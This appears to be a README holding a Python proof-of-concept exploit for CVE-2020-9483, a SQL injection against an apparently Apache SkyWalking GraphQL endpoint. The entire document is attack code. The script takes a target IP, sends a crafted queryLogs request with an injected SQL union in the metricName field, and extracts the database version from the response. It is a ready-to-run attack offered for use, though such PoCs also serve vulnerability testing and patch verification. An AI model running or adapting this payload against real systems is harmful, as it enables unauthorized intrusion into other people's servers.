README.md
Rendering markdown...
# --CVE-2020-9483-PoC--
# -*- Encoding: utf-8 -*-
import requests
import json
import argparse
import sys
import re
def host():
try:
parser = argparse.ArgumentParser(description='PoC for CVE-2020-9483 by shiro', exit_on_error=False)
parser.add_argument('-ip', required=True)
args = parser.parse_args()
ip = str(args.ip)
#print(ip)
url = "http://" + ip + ":8080" + "/graphql"
return url
except argparse.ArgumentError:
print("[-]usage:python3 CVE-2020-9483.py -ip 127.0.0.1")
sys.exit(0)
def poc(url):
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36',
'Content-type': 'application/json'
}
payload = {"query":"query queryLogs($condition: LogQueryCondition){queryLogs(condition: $condition){total,logs{serviceId,serviceName,isError,content}}}",
"variables": {"condition": {"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --", "endpointId": "1", "traceId": "1", "state": "ALL", "stateCode": "1", "paging": {"pageSize": 10}}}}
data = json.dumps(payload)
#print(data)
try:
res = requests.post(url=url, headers=header, data=data, timeout=3)
print("[+]got response")
except requests.exceptions.ConnectionError:
print("[-]timeout :(")
print("[-]bye~~~")
sys.exit(0)
print("[+]SQL Injection complete")
version = re.findall(r"\d+\.\d+\.\d+", res.text)
#print(version)
print("[+]Database version is " + str(version))
print("[+]Done!")
if __name__ == "__main__":
poc(host())